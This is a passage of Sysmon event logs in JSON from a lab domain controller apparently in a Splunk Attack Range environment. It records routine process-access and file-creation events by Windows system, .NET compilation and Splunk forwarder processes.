{"EventTime":"2020-08-01 07:01:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8244,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:57.326\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:57.326","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8245,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:57.326\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1365-5F25-0000-0010A96F0E00}\r\nTargetProcessId: 1364\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:57.326","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1365-5F25-0000-0010A96F0E00}","TargetProcessId":"1364","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8246,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:57.466\r\nSourceProcessGUID: {E2A3D6B1-1365-5F25-0000-0010A96F0E00}\r\nSourceProcessId: 1364\r\nSourceThreadId: 4532\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:57.466","SourceProcessGUID":"{E2A3D6B1-1365-5F25-0000-0010A96F0E00}","SourceProcessId":"1364","SourceThreadId":"4532","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8247,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:57.591\r\nProcessGuid: {E2A3D6B1-1363-5F25-0000-0010DE670E00}\r\nProcessId: 3756\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\eac-0\\System.Data.Services.dll\r\nCreationUtcTime: 2020-08-01 07:01:57.591","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:57.591","ProcessGuid":"{E2A3D6B1-1363-5F25-0000-0010DE670E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\eac-0\\System.Data.Services.dll","CreationUtcTime":"2020-08-01 07:01:57.591","EventReceivedTime":"2020-08-01 07:01:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8248,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:57.638\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1365-5F25-0000-0010F5710E00}\r\nTargetProcessId: 4424\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:57.638","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1365-5F25-0000-0010F5710E00}","TargetProcessId":"4424","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8249,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:57.638\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1365-5F25-0000-0010F5710E00}\r\nTargetProcessId: 4424\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:57.638","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1365-5F25-0000-0010F5710E00}","TargetProcessId":"4424","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8250,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:57.654\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1365-5F25-0000-0010F5710E00}\r\nTargetProcessId: 4424\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:57.654","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1365-5F25-0000-0010F5710E00}","TargetProcessId":"4424","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8251,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:57.716\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-132B-5F25-0000-0010AE7F0B00}\r\nTargetProcessId: 4968\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:57.716","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-132B-5F25-0000-0010AE7F0B00}","TargetProcessId":"4968","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8252,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:57.716\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-132B-5F25-0000-0010AE7F0B00}\r\nTargetProcessId: 4968\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:57.716","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-132B-5F25-0000-0010AE7F0B00}","TargetProcessId":"4968","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8253,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:57.716\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-132B-5F25-0000-0010AE7F0B00}\r\nTargetProcessId: 4968\r\nTargetImage: 